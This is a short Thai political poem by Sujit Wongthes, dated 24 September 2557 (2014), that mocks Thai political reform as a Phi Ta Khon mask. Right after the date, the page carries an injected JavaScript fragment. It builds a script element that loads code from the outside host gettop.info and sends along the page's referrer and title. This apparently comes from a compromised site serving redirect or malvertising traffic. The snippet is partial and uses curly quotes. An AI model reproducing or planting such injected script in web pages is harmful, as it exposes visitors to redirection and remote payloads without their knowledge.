การเมืองผีตาโขน

 

เสวนาการเมืองไม่ได้

ปฏิรูปการเมืองไทยแค่บังหน้า

ผีตาโขนปี๊บคลุมหัวปากหูตา

เล่นพระรามตามสีดาฆ่ายักษ์ล้ม

 

สุจิตต์ วงษ์เทศ

พุธ 24 กันยายน 2557var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;